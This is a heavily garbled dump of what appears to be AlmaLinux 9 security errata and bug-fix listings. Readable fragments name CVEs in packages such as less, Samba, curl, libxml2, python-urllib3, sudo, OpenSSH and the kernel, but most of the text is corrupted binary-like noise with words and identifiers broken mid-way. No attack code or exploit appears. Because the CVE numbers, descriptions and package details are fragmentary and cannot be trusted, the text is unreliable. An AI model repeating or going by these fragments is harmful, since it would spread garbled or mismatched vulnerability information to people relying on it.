* ice: high CPU usage with GNSS or ptp4l�5203154�5AlmaLinux 9 "smpboot: Scheduler frequency invarianc�Vent wobbly, disabling!" on nohz_full��s aft�Elong run�}78�}Dyi�percpu kworkers cause issues�Risola��Q[a��l��-9]�P229�PFJ9.2 Bug: [REG] NFS��finite��op of COMMIT�g��and�$4ERR_DELAY reply.�Y33�^��f erro��- "ev�syntax�: 'unc_p_delayed_c_st��_abort_core5'" b'_ value too big for�mat, maximum�� 255'��7471�: Inv�d charac�fdet� by rpmins�,�� Documen��ion/transl�s/zh_CN/process/magic-number.rst��8242��cifs: backp�� sm�Cpat�0s�� br��u��lose�9.1�0�1commit aea02fc40a7f�Tfix wro�>nlock bef�4��turn��om�)_tree�Onn�ܥ�904����x86_64, kdump 2��^nel���r��om�Gpanic�g"kvm-08-g�wt25.hv2"�_10614)The "l�'" utility��a text��le��ows��that��sembl�"m��", bu��ll�# us�� move�wards��t�f�Mas�k��s�!�. Si����do�]no�kad�8��ire�Fput�E��tartup, i�so�s �� quick���n�(dinary��edit��.

Secur��Fix(es):
�m��: cr��d data�Tn��ul�w�� -R"������� ANSI escape s�a��s�S��ơ(m���CVE-2022-46663)

F�0����ail��bout�5s���=(s), �-lud�t� imp�+,��CV�s���
cknowledg�$s,�o�/r���{�D���3,�f�㤩���Cg�m lis�,�R�&��c�:.Samba�5�kpen-sourc��le����AServ�iM�E��B�(SMB) ��toco��+��C�a�AInt��t��l�Hy��m�LIFS�;, which�� PC-��p��b�1machin��s�b���p��t���%�ou����-s���\MB2�0cke��ign��i��e�Dc��when����$= ���d"�0set�3-3347�

��1�otrus���hip�twee�Gis �5s�5�
��m����ai�:ail�y��23600)Libe�Cf��7�flex���H�igura�libr�o��rs�!man��key=���2���/. I�s� snippets��dif�t�	r�ories�ibuilds��f��K�Bit����:�ck-base�X�r ov���in��_�Q()��7/get��>t�.c�x22652��h��xml2��d��lop���lbox�=vi»��XML�knd����u: NULL�nr������
ma�1upCo�jxTy�4�848��
�IHash��o�	mpty�Mc��ys��n't�*	�`�i��946�I
��python-�s�`�p����a�
����de�aed�ake HTTP �9easy�
�e��t: Uni�2d�\leak��Proxy-Au�)riz�4h�r����2681�����{s�9e�1�}������]
�vow�a���R����G
��s��s�
��, F��eLDAP���}�ZDN�$dc�� m���y�³$Im�fp�C��	fica�[
V����32��V��POST-�-PUT�����6�R�o���|�3��!,����!any��d����s�	���E: ipvlan: �%-of-�-nds�T
��U�u�(ea�W	kb->cb�v�G
)�Ocls_�er�S�[l_�	_gen�_opt�5�P5788�QKVM:�
/mmu: ���e��N�_�f_fa�E�N�58��N��u�	�B
po�
�Cdo_prli�t���:/�P��0�[�YS�:��v2�
T m��g��cbl�L�<199�<�O�SSH��	�a��sup���La �,����, UNIX��s�vlar���
�e��	����������bo���!��cli��_���^
ssh:��mot�bd�x�*�m�-ag�MPKCS#11����840��D-Bu������Zsen��m�^s�Xappl����d���:���I-w���B�O�urv���a�sp����-logi���,���4��ac����d�W:�-dae��:�X�P����ure�4a ����c������=��dri�^��{b��l�ed�49�
subscrip�-�
r��grams����
�u�#��
�U�4y��Bos���;�o�e�t�R p����5ɷ: �d�e
�ya�J
of�b.�k.RHSM1 �� f�t��Oal��y�\�
9�
�!��in��!UP�!�����p�*��r����p
p��I���(throu���-Get-��Y����dm�t����P���������l 64���It����h�w�����	BIO�Ext�/�Firm�7�D�0(EFI),�Xp�4o�����?/DMI��.�is�stypi�ny�t���}��uf���r,����nam�zse�nl�^,�����g�Z�tag,�(���ɰ�p�n���s�;-b��o�%�
a�9�x�?63��_f�����$�	����$
��Aic�N��e��hw��md: Cross-P��'L�'�40593�4�Vfo����Yha�y��	up���� ��r �yt�m�t:��(5.14.0)�
�UAF��nf�>s�	�
�0�kup_glob�G�gg�y	�0h�bl���
d��nonym�Es�0�Xb���3��n�t�7nf_���o�;�Hin��a�� �
c��a�� �h�jNFT_MSG_NEWRULE�x61�x/s�K�Jw�pon���(b�ploit��s �8�c��
��cf_c��in�A f��776�����nf�7���i��e�	re���i��pipapo_���j4004�
\_newrul�d�]a �� �BA_�<_CHAIN_ID�\�Ű�y1���y���3�īݶibyid�1248�O�"��-�a�Ybyte�)er_e�4��001�Vs�e/r�����MSRs���S3��
s��*���Q163���&��bypass�`��d������e�S�a��� �Q110��g[�6	9.3 BU�5"[SPR][EM�FHF] ACPI:�1����w�5up�+ 802��[D��"�TM��!�!���j"��WD19TBS��S��wi�'VGA/DVI���-C��ng�s�j���rtmu��H�M�B��i�bwok�����)ue��in �"�3_adj�a_p��1���*21��
AWS ARM�gs�+�D�Mic��hif��2���s3��!.x�adat��
SEV-SNP �|!��>��L��U# ��u���
ne��� b�)��blk��ush_�m��562�<bpf_ji��$�
��g�-�dpy_�6��7�1�;69�o"��ep�c�j�cmsgr2��"fram�
����ng���	ck�707�Tem�����D�i���FIP�$teg�S�U��ould�=zeroiz�6�7%�]76��I�\���avf�g�ơeJu��Ӧ1815��i40e/�	]��$C�!�m�AMAC/�mi�41e:b7:e2:02:b1:aa/0��ifn��X4f0 ��0��� t��il�ava�:ble����lv�	ve�--sp�rca�I,�
��
�s ��hu��H48����%: ���5	�`un�
PMU�s3017��NVIDIA�G�: Ba��$i2c: ���� ��$�� d�#�fw��S483�S�nPEC���%MBUS�� ��X�*[Hy�kV][�i]in��le�6fc_���m��in �vsc�,s�{
��O�Aim��&���K3�&��K�"
�A o��CONFIG_CRYPTO_STATS���@(e�����$is�0h�j(��185�,�ק�Ex�	�Shv_�������b�wsrb�'�E
 SRB��US_INTERNAL_�(OR  (0x��
�{9�N
�z-�}'WARNING�'���&al�)d�'!�A�H��drm/as�b
��
��)���t6.4�M3��Lenov�a'��]  �&��&��M#echo c > ��'�rq-�x".�\70�h�f)bz20��69�/��/��ral�;(reg-suit�
�)aarch� (�s[pid]/w��
�)'��d392�eE����(�FEAT] �,*�*��_p���n�<HWP IO ��*s�3��,�l��7����Y- New MB�,AMP�*� C�~��Maya���}+a��o�d)�X896�X���ZMDRA��
- U��������k
�G�e	���� Add����5��-�+����1����#�r'��w�"�4���IX.1��t	er�� 6)�[a��15 �M�ie�	�!�&�����Ov�k#_�_��dup�G260�3�>Me�o
y��
��p�!�#c�t�E�
6�
�g�����p C�(�/�ʬ��%��;),�Am���%m)�ڢi���� �s� (nscd)�y m�ip�,�Ho��� With��se�q����c�����
l�$�):��%ld.��*�a��o�v�ge�*l��i91�0�QS�$
�H�Ug�Qddr��no-a����K527�Kp�i
���u��P�r806�Baih_i��@��P�[$����pre�3,��v��obj�1-�zn�Q��m��l��u�p�*���u��*cl�T�ex���Q
,�y�Y1l�% dy�ic��,�
����ng. ����|�?y��ll�C����.�Aw����W�%: TLS�M��ke��0217�&c�h%a�&p��*��SOCKS5�pxy���q85��Sc��i�j����n�u��8�X���nghttp2�������,��0T�
�pP��"�� 2 (��/2�_/�{C���,������web�?�vul�3�
t�dDDoS�1�_(Rap�LRes�L���448���#C ����s�u����s���.����
mar�F�3�Tf�%��.�M3��Bcrypt�ph��3�4�z���$i�I�<uth�Cc��ma��ԢI��7igita�d�E+a�W���$��7��Q4��
kcs�]rdos_�_�*� rc_����
97�0Ad�(�G�m
s:�Ҥ��j�ߤ%�Ti�;le�F�7��R� No�m�Wked���b�;t�G�Ua c�L�]of�)�q��Zma��0���(� ��in�K���0��� 'ar,�, g��f,��
, nm�������an�T��a�Lf,��z��.�p���m
2lin�] ���
�/�l)_bfd_�t_ge��ymbol���[_�������)����)2��:�>��r��:�;.ac�4��rol�2so�e��(R) PROS�?Wi��)WiFi�+276�;�A\40964�\�,��me��ism��a63�<ʾ�9v�R/in�]3�1�]�2R�D;A��.Pre�3���{�"����;���v056�H�807�
���'�
��n2�#�����=��dAc�C�*.�/�!��@/�@.�/3424�o4�m�6�x�o?�~�*C��"6ty'�PyCA'��I��
�������i����Ci��b�v��6�|:����via���2��	�l2393�Be��A-�'C��%�Goo�>!�Q�B�y���[:�c�(9������=_�'	_me�3��8468�<�G����%��2�9>�?�4��s��2��6te�C�
�]�
���-GNOME���s?�kF��y�n �#g���������<�0c��ms�
@�,���#: GVa�G�af�$-�e�
�t��*�\�"��i�'����&�=9��	�Wg_v�X�'swa���(t��4&��ime���	n�9�Y �
�)26�i��de�-� ����Dm� �E'�'�[��Y6�AK�7(-���-����#�M�n
�zword�[��(���,��X�4�Tuser�|g�+2p��
oun�:�º�E�1"��
�yl�Z��'�d(1)�Q�Y46�B*
c-ar����@f�Fa�eKch�J�sDN�D��DN��) �.�4��re�@Lv�{API.�6
/��(1.1�#)�A#103�!���3���2%_s�q
��()�+mis�y�?�K(�^90�
�aB�aUnd�2in ��_���
��)�311�2�D��)�Fic�p;�0Kn��J�#�f�����IDs�Q�&�Q��oToo�.���CARES_RANDOM_FI�T/���R*�)mpi�F�\�	�:��|�=��I�,���
	� >�(	��0�	to�.�=�^<�)���m� re�~H��palg�2hm�G,�6�/166���Z�8:�i�}i�n_�T_���	28�Q!�}z��!�4���3.9 (�.18�7����: �1P��K�Ky�65�c�E�07�$5�*=�$	g��R���?GNU M�r"��&arbit�
p���� a�e��s,�����s��C���};�ff�#�����o���)���H��4l�0�	�B�OR�C�s1-4�^7�=A�ӎR�4@s�,(4�:.6�<1�x1�i�s��Ro�<I�I*in��� AUTH�1AP���z5��@i��Xi�dssvc RP�I#�+��s�*li�%�'��D6�K���n�wK�L˜�#��	-s�u���0;�;�E�=��D�)G��d��g�(�[ea�4��n�� ��0��6�753�դCTELNET�q4IAC �)�43�4SF��P��~��%���9a�E1�:4�:�J����re��st�}3�=�A�tpm2-ts��%�5�=3��T�WW�bPl�H�;��
(TPM) 2.0�A��7�5��D�C�2(�����K�J�*#�����"3�TSS2_RC_D�F�74�=�pi�5�M�k������st�7%��Koft�`%�M�,.�@6n��4f��'�VP��I�x�PI�r��r����8acr�C �%�P��3��ei��"P�5I��s�Xs�a��z"���y
n���(new ����rout�<�p�`�L_-�@D�dB���hod��8�kc�Jb�e���r��o�]9�_m�2�
������u-�����fo����ic���xI��c��*�T,�'ut��0��E��8�j��
�Z�8to�>�x��:�R@a�N���;��-��va�/m��!�z��e�`�9�E6�<��]>�qos�n�R�0�/��K��i�(v�~�s��y���Eby e�Bn�
�~n�-���}c�hI�4S�6s��/�Jin une�$0��orm�"�tP�s���V�w��e�each�ֻ��ahel�fa�`�hi�p�
1y�} �#���
��bu�ce�D(KDC��Irb5: Den�^8����O�d'��un���}B���
60�`h�Pdou�=�'�� TGS�8	c�3997�A��l�LQ���a �"����T�R��#�wp�P��,�XZ�,�G�g�L
�n�Vt�[,�T��F��Ovm��?��,�F��!��pwdx����:�s�A�H4��>�<GAvahi�.�V
�	S�4Di�0v�\� �#7c��B�#��#�;^i��$Z��.�{UN�Qi�n�@�&Xat���dd�do���Q�. ���~�	-aw�	��%�m����I��u������mnd,�R9���,��	�peo�8to���
���n�����<��[�Y�P���1a�����3-���l-�6Yy-�8������%l�T/�6/�C�bY/so�g�P1��SH�ir��
�Y�L�_�6os�g �!_�Z�,Ms�uj�D�&�do ��HEly-�˺�?�>s5�D��®�K
�=shed�	D��W�198�=�	���jsmbd��	 �}4to�&	x�i�N�C�@�Q�Qoo�f96�)�3k�6
�u�Jt�5�
d-on��n�[
�b]��?9�R"rpc�H" ��g�!��d�
�Uslee�)�76�T4D ��	�h�z)�'[c�S@l�k�l� �
��v��X����5�~���A���<o�IPIN�L(��
�Dk�_ks��P��w�]Z����6�>N�T�MK�{����#B-� (en��<l��)�T1�To�� MyE�N�4N�l������?�7r�k�^�]53���ahL�=�Gki��a�)S�L �	���	L�;(�:)�������8(�I����(a �5{-�s"��-�]Q-purp�Jy��8���gDs�=�X��8�2���IV�H.�J�53�iwT���HM��f(R�����Z5��-�����7����P�f ���,�
�
v�8,�
�/�	��d�&����{�� OCTOU�)mi��
�BX��u�^f�Bm�
�%9�1\�A�:�3��wn/ch�/�Q���\����U8�Uш����/p��o��%�e
m�v@��1��u�a�|s�:��3�R��;���ks�G��o�T"p��ע��fP�POST abilities.

Security Fix(es):

* python-urllib3: Cookie request header isn't stripped d�Gng cross-origin�1directs (CVE-2023-43804)�e�^R�Wbody no�Saft�h�E from 303� atus changes��me��d to GET�r5803)

For more details�	out the s�issue(s), includ�Ӣ impact, a CVSS sc�G�
cknowledgments�nd o�/��lat��information,�f����R�� pag�m lis�,�R�&enc��s���:.SQLite���� �9rary�-at��le��� �( database en��e. A larg��ubset of�&92�Nsuppor�}�%co�Kte�A�!tor��a s�l�isk fil�ZT��API�(design�*f�iconveni�ƫe�M�xus��pplic�s��link again�ɥ�c��enjo��e pow�<�Jflexi��y�Q��wi���admini�Q�kve hassl�V�5����a�fpara�server�"sql��:�p-buf��-o�/flow ��sess��fuzz�71���P���n�'��pre�3,�ac�g, obj�1�en�Qprogramm��l��u�p, which��dmodu��, cl���excep�%, �^y high level dynamic�� type��d���l. ����s��fa�ԩmany sy��m�nll�C�^i��as well��.v�ous�bndow�̤;�K: Pars�.error�� em��/_p��Pdr.py��a��or��value�. �(�Z �5��tup���a2704���Qgrub2 p�ua���>vide��W 2���'Gr��Unifi�TBo�>Lo�(GRUB)�Ʋ3ly�figurabl�cu��miz�b�:l�:�@��a�prch��ctur�����S�b�e�kern���
�'�%�%,�`u���V�Mhardwa��vic���: bypass��� �
wor�k�X�'fea�`�001� nutl��!�NU T�s��Lay�h�I(GnuTLS�g�C��Ecrypt�ph�Halgor�m��]ocol���6�SSL, �R��D�	����: ti�s��-���0��SA-PSK au�
nt�$�598���K�+�fix�z�+�:4-0553�:re���e�f�je�T	���d�7ibu��tru��J67�FNet�/k�S��i�"(NS� �k	�.	����s��a�
p������elop���m�c-en�nd��i����j a�	�@ns��vulne����Min�?a�L�"�Tk�?6135�sudo���ta�1�ut�
����ows�
�
�to�=�	�Fusers��Qpermis�y�,ex� te
priv��g��omm��s,�o�X�C�	�^� ���purpo���

hav�]o�g��a����Bug��REn��c�H(��8487�: S�do��T
escape�'rol���	��in�0re���utp���S6�S��m����N42465�NT���C��u��	�,Reg���St�� V�|��s��OpenSC��/���
�������i��sm�G	c�ws.�Tfocuse�"n� ��B�oper���z���ir���q��, ��	�ТI��#d�/tal �Z����������s�z�j�=�k
�c PKCS#1�.d���M92�lugg�A�4M�O (PAM)��a����Aup�lpo��A�Ine����o�i���@h���V
�H.  ���  *��m: Im�Ep��Host�e I�S
��in�(_acc�L� �oA�C�zB�
�1096���
���P��Linux�!,����y����o	�����K�]pf:� ��runn�@���k������w41009)�IUSB:��ia�mos7840:�	crash�h�Wume�F2244�Fcxl/����\-�-fre���t�-of-�er��co�shut�n�_50226�tu�	��	��	 ��%����s �U�*�x�1lect�Mro���	)�x: `sc�pt_��`����`�}�-��j��arbit��,s�Td��
��2336)�si�5san��z�*��`�>�_�K` ��me�J�/� cre��()`�7�p7�)<net/smc��il�#
��rmb_d�2	�u���SMC-D��n�dump�26615�block�
��aliz�teg����-zero bef��wri��it�m�Ma�i385�ii��
u����	�
�ur��_�-
�_�_fault()�V499�V��T��: �&t����x��	���>	�O5018�O����,��	�do����&e�U��n�_���"ctx h���b669�l��: avoid�t����und���Sq�$c_pkt_len_�̩�[
UFO�\�9�nft�y�~:�Ӳ�f��!l���S����kb_���=�}��51��k�
��qVirtua�iviron�w(v�
) �8�3�~�=quot��th�K
9287)�[�
v��d�}IPv6�ӡFu�x�e�
1168��v�t�L��Qr�h�
�W	�T�004�\�c��:
�2� ��h�����[���X����3
s���s�����p�;�HTTP, F��eLDAP���}�2� �~��j�8
explo��a mix�c��flaw��3��21����SH��	�]�������"a numbe�L�? UNIX��s����	�rIt�����7���	���%�bo�4�����Tsh�(��4
t�r�at�	�	Bin�eP��@P��(BPP)��87��*��n�T����j�r
via ���vme�h���P51�$
�3�c
B��to���w2�1�null-ptr-de�բ��_��_� e�Z�u2739�@
�Ad�PF_PROG_TYPE_CGROUP_SKB�:h���G�6�l�3LINK_CREATE�i��64�i�va�Bv���rr��in�#�
afe��
0�
fs��
�����4�Dttr_�s.���
����ed ��7͢����_u�be_m�i_�k"_�Ĭ7675�sdiv�
����;988�arm64: �ys�O
mov�roken��R (�D"ral) ���e�V5�N�xfr��Bone���-�*��in��N���O11��SCO��UAF�p��_s�o���H25�HIS�His�H�nKVM�&S�Ign��nCR3[4:0]���<�pPDPTE�qme�
y��š�:�
�[	w SA&#39;��xle��[SA fa�y�r�m.�is���	�k42�
bne��wild-��-��_unr��X�Virq�: p/gic-v�_D��_a VMOVP�ra���VPE�O9Шhci���_�
_�M_�]cs�\25�qsc�E
/�ra��W��f��&
 �j���ask_�8_���23��o��nd�Ir�4'n t�a
_�k_n�W_key�P6���
���ki���?#.11��1��',�:	e�IBM C�N�, �� ��/4�ϡ5��M���x
���;	��}�G58�e�YCo���o�
���firm�)#�#d)��JeS�L�M�-l��MFC 4960�#�1S�
p�L�D Exp��2�:0863��
7�E�=z)��AP A�s��ĔF��	�	�V3�V�K�n$��also�K��soft�t�[�
�c�K)b��_�����$��)	Sl�Da����pkc�R)otd�ge�H�"
�d,���#�������v1.5 ����ipher�-�Mar�F��091�r)�a�	a�+�O�;(��XML�cu���pe�E:�3�,�/s�t�-ger�7�+���"�B�O3�4��N�zE���l��n�]�~�957)�"l�C"�;����	� '�	ws� ���fm�I"��", b����!
�!to �M	��w��@�M�H�'�.�1�Y���� 
���8�r�+put�Et��
r�c)��so��=�*quickl�-��G��
���d�Z"����: ����u����
��LESSCLOSE�
�d2-�!2���"��'�)�%�(83�1�N��a
�_1�'bu�G
�/�
�(�M��%him���8�st-���UEFI�+�C�s�0�/t����(���x
�3����,�7������
CE��http�:��m�O%��-�?e�,��U4054���P�"��m�E���p0�����	ify_sbat_�A
�32-�hs���r8�rO�6�prin��.��%�C6�C����_��;�mal�,����t
�]9�]�\�����B50�B���d ��
�MZ b��i���L�7L
��GSM �vp�3n�D#ac��di����N)�W(l���*�k�Y�U����(�1�, �R3��,�4133�6932�,9198�51�j1�779�80��{5�2658�� BR/E�PIN��i�p�
d�B�9	�ka���)on�4�1��0�l��cg��)li�>$����-8IX�
	�t �sl��kexha�O�2-0480��NULL����2-�-89�6622�15�2754�6�	�257��841�4�l�\!�k��N2_�|8�r���!b��/�#�J
c��459���a� _�!s��K�*�"_��	��604�|GC'�.�0���� �����,unix_�6*e�g(����
ic()����o���31�hO�\��zp�9�Wroup()��,��&l�0�67�)ev�'�_s�!�u9�u�3F���C�|��6y A���	D�tn���,40�Nird�������,�;57�2K�;dou���}�8��#_c�Ln��vb���9���W84��HCI: glob�
�)���sync��d86�S�b�"1e�!�pUARTSET�gTO�I�G���ua�$tty_ioct�*3��f������H745�y�89�9��12������IP��_CMD_ADD���SWAP����U�/k�"���f�&_�_�w!���[586�Csmb:�c��9OOB��/mb2�h8���+�5��mm/s�1���V�in�a��n
->u�
�V8��$���C��c&tea�����v#_pe�1dic���2�8�F��[
�?�A�258�V���]dge:��#�/in�-��"_�h_f�h)_f�W2hƯ78�]/�:��DETH_P_1588 �d�P
�^�î0�P�i: �f
_c�d�&����l,ooo ��g�6�CIFS��	�j�De�M0�I�,V�$����Co�E��*�V�y��f�r�:��%_�ed_�*d���&�9���u6����6����a��������wet �&!��	3�L�R#�X��2g�����
�j@s�G4֔tx�x2�u��՚�	lxsw��p�
ru�0l_tc��#F����	c�D3�K�i2c�801�<�Q*�_
��a�t�ha����9�}��m�arri�@���u-e ����'�F	n�;_�/�]60���	�8 QUEUE/DROP��+t��
��,s�W�local�s�%���zt�@walk�,pychunk�*617�O�/x86/lbr�R�� v��K�'��D���8.�7�anonym�O$��*���lip6_tun��NEXTHDR_FRAGMENT�b���,nl�*tlv��_��,�O3�Z2 �Ad���
Ch�JD��֤��n�6�'�Xi�l��B,�W��Alma�-R� N�s �r �w�͒
Squ��v��>mp�@�-on��
���r�
��7�/m�c,pu�c���vfs�U���,-�W
��un�Nd�?�<*���y.���Gdesti��R1�b1�<�]�&D�F�����a�"�$ymb�6)�`�Q107��6���g�HarfB��D�-�e���&T�o$��i�F�Mh�Rb�R:�;����O(n^2) g�#�!��con����E��9��.��:�Avahi�
�DNS�??���0v�B/� M��*t�#���Z�2C�C�T�?i�T/It �B/�at���dd�d�/a��n�7�`H���~�	-a��b?����|l�e=��H�C��2�R�K,�/no���,���I$�peo�to��t�0��O�٣���fi�
har�E�~<�P����a���^&�3�+��0r�Fin�_dns_��#ap��d_�O.��-3�i46�n�O�=_label�C70�Cdbus�3_h�Z4�6�C1އr�
��B2�Ba�t	��Ώ�=N�ex��)p��0���s�����.n�	p�exFAT�/���k:�w�s�r�C�H��z�s*�:�B3�H�43�un�D�"�O�Nan����Qsp��E
23���:N�q1L�>
�Ak���"Q�<�S�~s�M"(�:��&�g"�d"�-",�h$a�T -�G�9�	'-��E�"y �"�f�1�AES-SIV��&�z	�/a� ���'�D��;i�=-empty�oci����en�+�99���~Ex��d��	nt�O;��DH �H+s�2�y�:4� ���Oq�H�N�1�#!��G�a� �Xly�	
n�'9.42��or�e�*���!b�vN�9�.
���;8ÎPOLY1305 MAC��s�I����-��	P��RPC�[�9��i��")p�|���P23�;��'�V
�-���N�=���&��P�-��-����8g��,ab��,b���
(pse�WJ-)�#*�10��$�Q�$�ca�es/ntfs��%un��Mc��e���
692�]�N
���\�8�AY���F���-�H
���M�n�:�š��7�0�/V�7LSB ��A �C?���s��Xgr��O�D�K�?p�,�
����RD-Bus���?���r,�泌s, o��&�;�3��9�#�b�/��keeps���A:f��e�<�fc�!��n�����,��@snapsho�
��q���P�[e��L�m����ao�
�$���	��el���Y�a����y-�Y��!�ic����-��	d�-����N�9�Yysv�����/-��olv�]U��$re�%
ns��z�7i�S%�U�n1�c(D�RREC=ye�7008�@��erout�y�-��P���;IP�)�o��i��t�J����(���+�) �1�>��:���2�=lin����316�<�l
s�^!�
�>3�0�<�D@�K�45�N
�.�$�U��:�?xyC�/�J�I�Ys��?�bma�����th�W�F�~�60�_a�lMi�#�(H���I�`
��R�� �Y)�A��%�As�Zden�"����-�N�[��?���H�T�q���R�wHdif����4��H��#�3L�ϣF� (ELF)�/�}s,���HRPM�u	��v�z3�o�1�$�\:��"����0-�/�%�!�o�unc�\�55��L�>�wpa�>����	�d�y80�_<X�,X�%�=�;WE��FWPA��Y;IEEE�71i /��N)�W�:GE�c)���P�k<y�key�goti�'�|a�h�fo�����
i��W�T
�,a�:���ƌ��a���WLAN�
i�����P�5�b�d��Q�5452160�A��8��2��8�?�x�'`�?SSSD) �� �\����e���^t��2+d��$i�7�K�����A�����g��N�
�!S���A��`�M�!�l�P�Q1����ha�-!�J�&+-end��=��T���-����s�k!c��ss�$HR�/�}�l�?6GPO��a,�/in�.$��ntl�!F�H05��
�`_�{��JIRA:�Q��a3*�5ss�hc�To�"�P:a�et��W�4O�=816�� �I��s72�*���xml2��
�b�3box�Y���#��?�-�	��u:��I�?Re���550�E�5� � 	�3��!�;n9�C��,�������4d��/�u���=�U6�743 h�.am��Ins�.�ra��W#VC�QU��9�FAMD-SN-3�,�L2��`,���ffdhe*�:ti�:i�	�s.��0a2e5b909���B.fips_�Qed=1 l���@"w���9cy t��>��]�3mglru�I-u�1>�e�2\�Rcache�B92��B[EMR] [TBOOT OS] SUT �ld�1go�nS��p�s��9.2 T�OS O�>CPU ��-16 �^BUSYɄ6��$����F	����t�
- NMI���v+�E30��E�g0�:6f:00.��^PTP��	��get��C�L
�l�[f�m/�I*��7d�h�unbin�Z�x/��O664�$1��/�V���[�	"1�3�@Zl�
3��4�^
 ��;in���E��s�m7���S0�R0�.�9�1pe�nX�t�^m�+�N�s��gl�aU��d�4��F� �/���<����p�),�Am�R7�%m�X�i�:�J���	 (nsc��H�#��p�9$o���tW�o$se�q�����v�0����	l�"�)�_;��Lic�gs ��2�z�}O�r2-CN-��1
�9��S�e��<������F335�P�G��M���u��Oin�)
�Y��Y�2ma�rm�B0����'l��V�r�L�Z1�Zas�cs N�0�3��	�K#n-��[g�4�T��ng�D�v�$�	��Hyp�kK��p�V� (��X/2�(%�{C���y�p8ONTINUATION �N9s��PS�P18�
�4K�](�U�1K �S�8��r���+K���KOS��X�f2487�'ipv6��r�{=�
���S�7��
�Ufs:���F� >���9in�_br�_�� e_�0��S89�
#����c-a���Odefi�|h�<h�RJ��	�
3(Dom�����) �a<�����n � ���S�N�~�.�6�_�C��56�u(�8��`�HC�pi�v6�e�!��q�X��/�	��#a�(b�}�f�g#�c�3�q�=��Xg�o+st���g��SE�itr�Dsho��O�7ter��-� �:|�%������:�9��E��sos��W[rt with a crafted name (CVE-2024-2947)The hsakmt packages include�:thunk library for AMD's Heterogeneous System Architectur�gHSA) Linux kernel driver (amdkfd).

Security Fix(es):

* python-idna: potential DoS via resource consumption�spec�(ly��inputs to �L.encode()�3651)P�q is an�4��pre�@,�act��, obj��-orien�^p�ramming langu�<, which�Bs modules, class�exce����y high lev�"y��ic dat�|ype��d���l. ��support����face��many s��c��C��i��as well��.v���window�̤;s��: Pa�^tra��s�����5pfile.T�o�3Dir�3o��t3-6597)�G��zi�8�.��vuln�{b�
���-bombs�(ad���deni�xf servic��0450)

F��mo��detai�
bout��e�3��issue(s)��]h��mp��,�CVSS sc�G�
cknowledgm��M�\o�/r��la�w�)ma��,�f��O���cg�j��s�)�R�#����sec�7.OpenSSH���	�otocol��le�}�b��Nby��numb�q��}, UNIX��simila�p�Yt�� It����� ��s ne��s�bo���!��cl��_��er�7o�0ssh�8ossi��rem�� ����3��du���a��di�i��ign��h�ll����6387�y�o� ���+����Ȥ3�M,������.  ���  *�K:��t/mlx5e:�"�D�spr��d�� bug���j timestamp�hnapi_po�P��ext��52626)�kBlueto�A: Avoid��use-�r-free�mhci_error_�e�Y�6801�Ycrypto: qat -�(lve�Ed�	��AER ��o��U974�Uxen-�fr�ܡ�dd mi���akb_mark_f��cycl�`7393�K�gf�ga��dou���fs_��_cre�b_groups�W67�[smb:���]UAF�3mb2��onn�h_���5870̨��r�
�U�pk�w�� ru��v��t���O96�O: hns3:�� no�/llow��_nic_�%_�%��p��dl�1-4740��
B����ci��-�>n�.��_�_�_se�DJIRA:Alma�1-2894��BUG: un�t�fe�� fault�addr��cf16bf752f593ff8 [a�Tl�T9.4.z]�k35672�k[HPE �& ��]�qu�Q merg���g	�i�cnsl���	pat�f��i���x6220�x�9]�/�� �4�\/�_de��.c:51!�\68���: DPLL-���ݡ71�)CNB95��sched��pda�(TC�����t�m v6.�y764�.IPv6: SR: b�e������m�X�S69�TRFE] B�Ot�	s��swap�u�o�
�U825�#I��D��s�,u�w�s�p	��5���O����gfun�^�8��	���	d.ۈ595�ީ�]�auto��c VF�bet��Tx MDD ��
nt��9083�MC�»REGRESSION] �Nbos��:�
 brok�'�z10+ sockets��495�ybnx2x�*�1sh�� PCI �q�e,�s�|
k��432���

��
aff�0�P���
409�'�
TIPC m�����=mb��$
���=il�b�688�
e�7�is�/c���_dsaf_��	c�	�;array �@
f���
�/ge_sr�Fby_��l	��548ā�	�c���whclgevf��nd_mbx_msg�V9��v�
mem���lap�when��le��char���buf�,�Y2-4862�j
ca�"j1939:�!��Madl��ch��Y�#_�s_���rw�	��
3�mm/vms�f�u��+
��akeup_k�\d�[��w�g zon�?dex��7�n�s�Us���%b��i�,e�B�PTP WQ xmit��b�on�	ck��oc��s ���pul��Mm�����'pÐ85����B�
f_t�
��use�l
���	�<��ze��"�S�a�|7�avm�w�
��f������Ad tag�c���W435��e��;in����jcript����ehavior�)�tcp���c�9	_�Q_��_z�r�cp_twsk_uniqu��.��90��
��
�(	_hmm.c:��src_pfn�c��������\854�Ir8169����b�I�u�	�Rra��cTx�R��a��`�r��g�iv�c���fr���#�8841�^���yt��xy�i�Wu�f�.�/s���2is��d��h���v3�+�
octe�0x2��: a��off-by-��r�7�ys�Hpa�O95��blk-c������d�K�
��io �1
�663�z�	� �
Libndp�	�(�C�	NetworkMan�Pr)�Eat�	vi�_	�,�	er�$�a�
�4�b�Dis�P��	�	also�D��l�U�idp�
�n�&���NDP���Yl��:�9�[r�����<�ng�field��5564�t	�_firmwa���|	�8�e	�B�$�.��r�T��
�������	e���oR��i�'g��	sp���Tm�	�sb����*i��ize�3-31346�Comm�����(in�o�(CUPS)�-�	
�Yp�*lay���(
��c�: C�d�M�*n�bit�ch�W 0140777�~2����$��	�4�d�p��kr�es�,4032�'�b���k	ull�	��Ar����i�)	l.c�
����ogic�t�B�z�{e��Zgn�[524�P�4�w	��
ng�M���=	�I�W	���5_�1try_b�:f��m
��U
7�J
bp��	�
ac�d��7
�_�
r_��
cel_a�������c3�	dm:�6���{um�f
ho�
�Y�suspend�K88��ip����;ip6_�y_mp���ify�8��USqu�Nfs���
��n��is�&�v��d �u�h�8�^98�^nf�
�	������>��s����}���{
sepa��^rs��[�(s�O3�Uicmp��SNULL���|�-_build_�b�!58��b�bige�����irq�;�NAPI �~�s0�Rsto���.shut�_nĚ8�	scsi�mf�d�������fc_l�
_ptp_�up���8�G�h��c��_���o�
�Ī�rx_k�p�]�,���`�X5�`��p��Rel�}�ba��ef���$_�l���_þ��
24�]Mov�PIV'���@unregist�to���#��n up�h5�*�9�o$-xgb�����aund�e�I��7��e��:��
b�Xer��"life�Œ����d�E0�/ph��6����m�iple�aws�6808, �7065���99��e���?:�R2�awifiԄ97Ą52�4���51ä78¤�4��4��937��941�22���r���6�igc�!5�Admae�e/idxd�,182�,��R741�����903��6�,"��5ǂe���!��6sw�#�eep���$4�<�5�!91ŭp�׺�/x86�*�6�\i40�M602Ÿrt�<l��!�'1�1�x���7�t7�G�V606�W5���2�5��pvl���t�a��1�!7�e!��ir���$��tls�48�uxl/�ođ839őbo��%948�]n�r�8�3���1��2�	�����7�����n	lo��)���.
��s �
